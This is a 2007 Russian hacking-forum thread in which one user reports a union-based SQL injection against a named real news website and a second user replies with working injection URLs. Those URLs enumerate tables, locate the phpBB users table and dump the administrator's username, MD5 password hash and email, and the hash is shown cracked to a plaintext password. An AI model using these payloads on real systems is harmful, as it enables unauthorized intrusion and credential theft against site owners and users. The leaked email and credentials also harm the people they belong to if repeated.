ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу не выводится содержимое колонок Sql ing
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

не выводится содержимое колонок Sql ing
  #1  
Старый 29.09.2007, 10:31
Аватар для SIdoy
SIdoy
Новичок
Регистрация: 19.09.2007
Сообщений: 12
Провел на форуме:
324160

Репутация: 19
По умолчанию не выводится содержимое колонок Sql ing
Сайт вида:
http://www.volga-astrakhan.ru/index.php3?act=paper&n=25125
Нашел уязвимость, подобрал число колонок. Версия 5.0.45-community, значит есть возможность узнать имена всех таблиц и колонок. Вообщем получился запрос такого вида:
http://www.volga-astrakhan.ru/index.php3?act=paper&n=25125%20and%201=0%20union%2 0select%201,2,table_name,4,5%20from%20Information_ schema.tables limit 0,1--
Вывелось название первой таблицы:
CHARACTER_SETS
Формируем следующий запрос:
http://www.volga-astrakhan.ru/index.php3?act=paper&n=25125%20and%201=0%20union%2 0select%201,2,column_name,4,5%20from%20Information _schema.columns%20where%20table_name='CHARACTER_SE TS' limit 0,1--
Вывелось название первой колонки в этой таблице:
CHARACTER_SET_NAME
Но когда я пишу и имя таблици и колонки, или даже просто таблици, ну например:

http://www.volga-astrakhan.ru/index.php3?act=paper&n=25125%20and%201=0%20union%2 0select%201,2,CHARACTER_SET_NAME,4,5%20from%20CHAR ACTER_SET--

либо:

http://www.volga-astrakhan.ru/index.php3?act=paper&n=25125%20and%201=0%20union%2 0select%201,2,3,4,5%20from%20CHARACTER_SET--

выводится пустая страница...
 
Ответить с цитированием

  #2  
Старый 29.09.2007, 11:40
Аватар для big_BRAT
big_BRAT
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме:
1292655

Репутация: 168
Отправить сообщение для big_BRAT с помощью ICQ
По умолчанию
сначала находим нужную таблицу
http://www.volga-astrakhan.ru/index.php3?act=paper&n=-25125+union+select+null,null,table_name,null,null+ from+Information_schema.tables+limit+28,1--

потом определяемся в какой базе она находится
/на сайте есть форум phpbb, а там есть таблица phpbb_users которая в 16 формате выгледит так 0x70687062625f7573657273/
http://www.volga-astrakhan.ru/index.php3?act=paper&n=-25125+union+select+null,null,table_schema,null,nul l+from+Information_schema.tables+where+table_name= 0x70687062625f7573657273+limit+0,1--

потом получаем данные из этой таблицы
http://www.volga-astrakhan.ru/index.php3?act=paper&n=-25125+union+select+null,null,concat(username,0x3a, user_password,0x3a,user_email,0x3a,user_icq),null, null+from+test_bakulina.phpbb_users+limit+1,1--

получаем
admin:e10adc3949ba59abbe56e057f20f883e:mica@sos-ru.com

расшифровываем хеш
e10adc3949ba59abbe56e057f20f883e:123456

ставим мне +))))
Последний раз редактировалось big_BRAT; 29.09.2007 в 11:45..
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ